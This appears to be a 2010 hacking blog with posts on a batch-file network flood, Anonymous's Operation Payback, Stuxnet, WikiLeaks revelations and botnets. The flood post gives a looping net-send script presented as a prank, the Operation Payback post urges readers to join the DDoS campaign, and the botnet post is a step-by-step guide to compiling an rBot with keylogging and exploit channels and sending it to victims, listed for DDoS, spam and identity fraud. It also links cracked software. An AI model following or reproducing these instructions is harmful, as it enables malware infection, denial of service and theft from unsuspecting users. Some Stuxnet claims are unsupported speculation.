Tuesday, December 14, 2010

Flood a network

Ever thought about flodding a network?
You can do it by using Batch programming.

Open notepad, and write the following code

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH


Now save the notepad file with any name having a .bat extension. 

How to flood the network?
Hhhhmmm, just run the file...
hahaha....:-)

Thursday, December 9, 2010

Operation Payback

Twitter and Facebook have deleted user accounts operated by hackers who have sworn reprisal assaults in opposition to services seen as deserting WikiLeaks recently.

The online fight known as Operation Payback has been operated by means of social networking websites, plus additional chat rooms, to organize its computer attacks. Both Twitter and Facebook have deactivated accounts that came out as the campaign’s name, apparently for relating to hacking codes and other progress that violate their terms of agreement.

But these actions were not able to stop the Anonymous collective of “hacktivists” from attacking the websites of Visa and the Swedish Govt.

WikiLeaks itself was using Facebook and Twitter as the main message channels, despite excessive pressurized demands from US to pull off support for WikiLeaks.

PayPal, Amazon, MasterCard and Visa have all stopped operating with WikiLeaks since last week, each asserting that the website infringed their terms of agreement.

Anonymous, working separately from WikiLeaks, has besieged some of these websites, claiming it objects to everything like internet censorship. On MasterCard’s online payment processing service was compromised.

Wesites of J. Lieberman (criticizer of WikiLeaks), S. Palin (former US VP candidate), and the Swedish prosecutor scrutinizing on incriminations against Julian Assange of sexual offences have all been compromised.

The action of Twitter and Facebook, two foremost social networks, in opposition to Anonymous could menace acts of vengeance by the hacktivists.

Operation Payback referred to Twitter as a probable target, arguing that it was blocking WikiLeaks from appearing on its “trending topics”, the main themes for chat on the website.

Visa’s website was unreachable from London and extra services were also disturbed.

Anonymous claiming the attacks asserted it is not a group of hackers.  It portrayed itself as “decentralized” and “river like”, and is a continuing movement “in opposition to those who misuse the internet”.  Currently, the position of Anonymous is aimed towards those employing unfair means to brawl WikiLeaks”.

Anonymous in no way is launching attacks against critical infrastructures, rather it is only causing disruptions in websites.

Let’s join Operation Payback.

Stuxnet, WikiLeaks and Cyberwar

Stuxnet (A computer worm), the first to include a programmable logic controller (PLC) rootkit, is a Windows-specific computer worm first discovered in July 2010 by VirusBlokAda.  Stuxnet takes in the ability to reprogram the PLCs and put out of sight its changes.

WikiLeaks - the website that has unveiled the inside of over 250,000 ambassadorial cables from U.S. embassies to countries worldwide.
 
Cyberwar has been defined by security expert Richard A. Clarke as "actions by a nation-state to break in another nation's networks with the intention of causing disruption or damage."

Stuxnet apparent target is Iran.  It aims at attacking infrastructures using Siemens control systems.  Damages were inflicted on nuclear system in Natanz and caused delay in Iran’s Bushehr Nuclear Power Plant.  Stuxnet has been designed to steal data about production lines from the Iranian industrial plants.

Stuxnet attacked Windows systems using 4 zero-day attacks and a vulnerability used by the Conficker worm.  Stuxnet is roughly about 0.5 MB in size, and coded in different programming languages (including C).

Russian digital security company Kaspersky Labs released a declaration that portrayed Stuxnet as "a cyber-weapon that will show the way to the foundation of a new arms race in the world." Utilizing cybernetics, the new fighters can have an impact upon an entire nation-state, causing severe chaos and harm with a negligible outlay of endeavor.  In 2010, we have been hit by warfare by two distinctive events: Stuxnet and WikiLeaks.

It can be observed that Stuxnet was sending information about the nuclear program to its creators.  Very quickly, it forwarded quite a lot of details about the Iranian nuclear facilities.  By then, the US knowledge about Iranian nuclear initiatives was the same as the Iranians, if not more.  And this information involved not only services and machinery, but also human resources.  It’s well possible that the 2 nuclear scientists assaulted on November 29 (one killed, one badly injured) were recognized as fundamental to the Iranian effort by Stuxnet.

Further support of the above can be easily acquired from the WikiLeaks saga.  It is no overstatement to affirm that Julian Assange is engaged in cyber warfare.  He is at war, not only with the US, but with the corrupted world leaders as a whole.  Julian Assange can bee seen as a mythic figure, a man with a historical task. 

The only thing that astounded many was news of China's eagerness with North Korea.  The assurance that China would support North Korea to the last trench.

Scrutinize the sequence of events.  Bradley Manning (United States Army soldier) stole many secret e-mails and forwarded them to WikiLeaks.  The e-mails started off in great part from the Defense Department (Robert Gates), and the State Department (Hillary Clinton).  The Justice Department (Eric Holder) couldn't make out what to do about the leaks.  All of them work for Barack Obama.  That's an appealing remarkable lineup.  The only one missing is Van Jones, and he'll almost certainly crop up.

Wednesday, December 8, 2010

WikiLeaks Top 10 Revelations

WikiLeaks, has unveiled the inside of over 250,000 ambassadorial cables from U.S. embassies to countries worldwide. The White House cautions that the disclosure of extremely sensitive confidential documents could severely bang U.S. foreign policy interests around the globe. WikiLeaks itself has up to now published around 220 cables, but it has diffused information from the entire cache with quite a lot of press.

WikiLeaks Top 10 Revelations.

1. The Saudi King pressed for a U.S. attack on Iran
King Abdullah, the aging ruler of Saudi Arabia, has repeatedly urged the U.S. to attack Iran—"cut off the head of the snake"—and destroy its nuclear facilities. It's not just Saudi Arabia, though. According to the cables, leaders in Israel, Jordan, and Bahrain have also called for military action against Iran.

2. Iran may have North Korean missiles
The Islamic nation reportedly obtained missiles from North Korea capable of attacking Russia and Western Europe. Iran is said to have 19 North Korean BM-25 missiles, and officials warn the rockets might give Tehran "the building blocks" to build larger, long-range missiles on its own.
               
3. The U.S. is in a nuclear standoff with Pakistan
The U.S. has been trying to remove highly enriched uranium from a Pakistani research reactor for three years, fearing it could end up being used in a nuclear device. Pakistan has so far refused to grant access, as its officials worry that local media would portray the move "as the United States taking Pakistan's nuclear weapons."

4. The U.S. has been secretly bombing Yemen
The U.S. has launched covert missile attacks on terrorist targets in Yemen. But in a meeting with Gen. David Petraeus, Yemeni president Ali Abdullah Saleh says "we'll continue saying the bombs are ours, not yours." These air strikes killed several civilians, and this revelation may yet "spark a backlash against Saleh."

5. China has been cyber-attacking Google, the Dalai Lama
The cables confirm that Chinese cybe-terrorists were behind an intrusion into Google's computer systems last year. The attack prompted Google to withdraw from the country in March 2010. Chinese hackers have also broken into the U.S. government, businesses, and even the personal computer of the Dalai Lama, according to the leaked cables.

6. Hillary Clinton has reportedly 'spied' on the U.N.
The secretary of state issued a classified directive ordering U.S. diplomats to gather information on the leadership of the United Nations, including credit card numbers, DNA, fingerprints, and iris scans. Officials targeted included U.N. Secretary General Ban Ki Moon and representatives from China, Russia, France, and the U.K. This may violate international treaties.

7. Silvio Berlusconi and Vladimir Putin have a special relationship
The friendship between the Italian and Russian prime ministers goes even deeper than previously thought. Cables detail the exchange of "lavish gifts," deals over lucrative energy contracts, and "the use by Berlusconi of a 'shadowy' Russian-speaking Italian go-between."

8. Afghanistan VP carried $52 million in traveling money
When Ahmed Zia Massoud, Afghanistan's vice president, made a trip to the United Arab Emirates last year, he was discovered to be in possession of $52 million in cash. In a cable, the American Embassy in Kabul confirmed Massoud was allowed to keep this "significant amount" without explaining why or how he came to be carrying it. Massoud denies carrying the cash.

9. The U.S. bartered with Guantanamo prisoners 
The State Department was so desperate to empty Guantanamo Bay that it attempted to barter with various countries to take prisoners. Slovenia was told it might receive a visit from President Barack Obama if it accepted detainees, and the island nation of Kiribati was offered millions of dollars in incentives to accept Chinese Muslim prisoners. American diplomats suggested taking in prisoners would be "a low-cost way for Belgium to attain prominence in Europe."

10. World leaders aren't exactly treated with deference
The cables include a number of "diplo-disses". Kim Jong Il, North Korea's dictator, is labeled a "flabby old chap" by one source. Berlusconi is "feckless, vain, and ineffective as a modern European leader." Zimbabwean leader Robert Mugabe shows "deep ignorance on economic issues," and the American embassy in Moscow refers to President Dmitry Medvedev playing "Robin to Putin's Batman."

Hat's off Julian Assange.

Monday, December 6, 2010

Botnet

Hello surfer,
Welcome to my blog.
As you may notice, you are on planet BotInfect – Security, Hacking, & Forensics.
Quite easy… huh.

Have you ever come across the term botnet?
One logic here, if this is the first time you are hearing this word “botnet”, then you may probably be in a botnet.

What is a botnet?
A botnet is also termed as a zombie army.  Imagine you part of a zombie army…. Seems scary!!!  Basically a botnet is a compromised machine under the control of an illegitimate user.  In other words, if you are part of a botnet, your machine will be used to execute tasks such as spamming or forwarding viruses to other computers on the web.   It has been equally observed that most computers on a botnet are home-based.  Reports by Kapersky Labs and Symantec has revealed that the biggest threat on the Internet is not spam, viruses, or worms….The real menace emanates from botnets.

Are you on a botnet??
If you are part of a botnet, you computer is transformed into your worst enemy.  This is no fun since your computer spies on you by collecting everything you do with your machine and forwards the data to the bot-herder (the person who originated the network).  The bot-herder can equally use your computer to execute his commands.

How to setup a botnet?
Being a botnet owner is among the many coooool things one may like to do.  However, I make it clear that this is illegal stuff.  Today , FBI arrested a 23-year-old Russian man for Mega-D botnet believed to be responsible for one-third of the world's spam in 2008.
 
First lets download all the thing you need
  1. Visual Studio 6
  2. Visual Studio 6 Service Pack 5
  3. Visual Studio 6.0 Processor Pack
  4. Windows XP Core SDK
  5. IRCPlus 1.5 + Crack
  6. mIRC
  7. http://www.no-ip.com account (ill go into this a bit more later on)
  8. Bot Source - http://rapidshare.com/#!download|121l33|28549191|rx-asn-2-re-worked_v3.rar|319

Second Lets Setup Microsoft Visual C++ 6.0
  1. Run Microsoft Visual C++ 6.0 setup.exe and install it (Serial: 812-2224558)
  2. Install the Service Pack 6
  3. Install Windows XP SDK
  4. Open up Microsoft Visual C++ Compilier 6.0
  5. Go to Tools > Options and Click the "Directories" tab
  6. Browse to these directories and add them to the list: (Click the dotted box to add, make sure they go in this order)
         Code:
             C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
             C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
             C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
             C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

Time To Make a No-Ip Account
This will help stop people getting your IP address.
  1. Goto No-Ip.com an make an account
  2. Setup a free Host redirect e.g botnet.no-ip.biz
  3. Click on downloads to download your No-IP Dynamic DNS Update Client
  4. Run and install the file you downloaded, now leave this for now.

Time to install your IRC_plus 1.5
This is were your host will be (were your actual IRC will be stored). Now you dont need to find/Root a box (anyways lets carry on)
  1. Install IRC_plus
  2. Use the crack "It will say it never worked, even tho it did"
  3. Now open IRC plus "Remote Control"
  4. Download THIS guide (made by me, for you :D) to show you pictures of how it should be set-up step by step so it works correctly.

Time to setup the mIRC client
The client is so you can connect to your host that you just setup. Without this you would never be able to see the chat room haha.
  1. Install mIRC
  2. Open mIRC and fill in the usual crap: like name, email, nick blah blah and press ok
  3. Now click File> Select Server> Click Add> "fill it out as below" e scription: What ever you want
    Description: What ever you want              
    IRC SERVER: enterwhatyoumade.no-ip.biz (Use the no-ip DUS you made)
    Ports: 6667 (this is the most common used but it can be 6000-6010, use whats in your bots config an the one you used in your host)
    Group: what ever you want
    Password: Password you made in IRCplus
  4. Press Add> Press OK
  5. Leave mIRC open, open No-IP DUC and Open IRCplus
  6. Go back to mIRC and press the lightining bolt in the top left area.

You should now be connected to you server, Now type:
/OPER admin password (Make sure to change password to the one you made on your host)

/join #youchannel (make sure you replaced your channel with the one you made on your host)

You sould now be on you IRC chat room (channel). If you are then your doing good, if not start this TUT again and follow everystep to the letter dont skip ahead at any time.


Now the Bit You Have Been Waiting For: Setting Up Your Bot
1. Unpack "rx-asn-2-re-worked_v3.rar" Bot Source
2. You should see an rx-asn-2-re-worked v3 folder
3. Open the rx-asn-2-re-worked v3
4. Open configs.h folder and edit these lines only:
Code:
// bot configuration (generic) - doesn't need to be encrypted2001
int port = 6667; // server port (Change to 6667 or the port your IRC uses)

Code:
#else // Recommended to use this only for Crypt() setup, this is unsecure.

char botid[] = "Mr Bumbastic"; //Change to what you want the bot to be called
char version[] = "0.1"; // Change What version you want it to be called
char password[] = "password"; // change to a password you will use inside your irc so bots know its you
char server[] = "yournoipduc.no-ip.biz"; // Change to the No-ip DUC address that you made.
char serverpass[] = "paswords"; // Change to the server password you made on ICRplus host
char channel[] = "#bots"; // Change to the channel you made on ICRplus host
char chanpass[] = ""; // Best to leave this blank, we dont need we have a server password
char server2[] = ""; // Does not work so make it blank
char channel2[] = ""; // Does not work so make it blank
char chanpass2[] = ""; // Does not work so make it blank
char filename[] = "crss"; // What you want your bot to be called in Task manger (i think hmmm)
char keylogfile[] = "keylog"; // keylog filename (says it all haha
char valuename[] = "Microsoft"; // value name for autostart (not to important so leave it as microsoft)
char nickconst[] = "zombie"; // change to first part to the bot's nickname in IRC
char szLocalPayloadFile[]=".exe"; // What you want your bot to be called in Task manger
char modeonconn[] = "-xi+B"; // Havnt got a clue so just leave it
char exploitchan[] = "#bots"; // Channel where exploit messages get redirected
char keylogchan[] = "#bots"; // Channel where keylog messages get redirected
char psniffchan[] = "#bots"; // Channel where psniff messages get redirected

5. Save it and close Visual Studio 6

6. Now open the rx-asn-2-re-worked v3 folder again > open rBot.dsw

7. Now right click Rbot file and click build.

[img]1. Download and unpack: Rxbot 7.6 (212.3 kb) Mirror 2 Mirror 3 2. You should see an Rxbot 7.6 folder 3. Open the Rxbot 7.6 > configs.h folder and edit these lines only: [/img]

8. Your botnet will be save in rx-asn-2-re-worked v3> Debug folder

9. Send this to people rBot.exe to people


Lastly Using the bot
Firstly i am just going to give you very basic commands to use. Make sure you have mIRC, No-IP DUC, IRCplus running and have some bots already.

1. Ok now connect to your server using mIRC

2. Make sure your the admin (/oper admin password)

3. Use the commands
Code:
.Login botpassword
(You have to do this first so the bots listen to you, make sure botpassword is what you set in config.h)

.Remove (incase you opened it on your pc, also removes from other pc's and leaves nothing behind)
Download a complete list of commands on http://rapidshare.com/#!download|47l34|21542921|cmands.html|45

Your botnet is ready.  You can use it for:
DDoS Attacks
Spamming and Spreading Malware
Information Leakage
Click Fraud
Identity Fraud


How to know if you are part of a botnet?
You know how to create a botnet, and now if you are part of a botnet…..How to make this out?

Check your Internet connection.  If it is slow, then may be a botnet infection is using your connection to send / receive data.

If the above holds true, close all your problems and open Task Manager by pressing the CTRL, ALT and Delete keys at the same.
Click on the network tab.  Check if your PC is using the internet network connection.  If the percentage is high, then you are probably in a botnet.

If your PC is infected then it is most probably that your current security software has already let you down.  You may try the following free anti-botnet tools:
RUBotted (Beta) from Trend Micro,


How to track a botnet?
Now that you are more at ease with botnets, it’s equally important to track botnets to catch the bot-herder.  The most effective way to track a botnet is the making use of honeypot / honeynet and intercepting their domain names to analyze their DNS queries.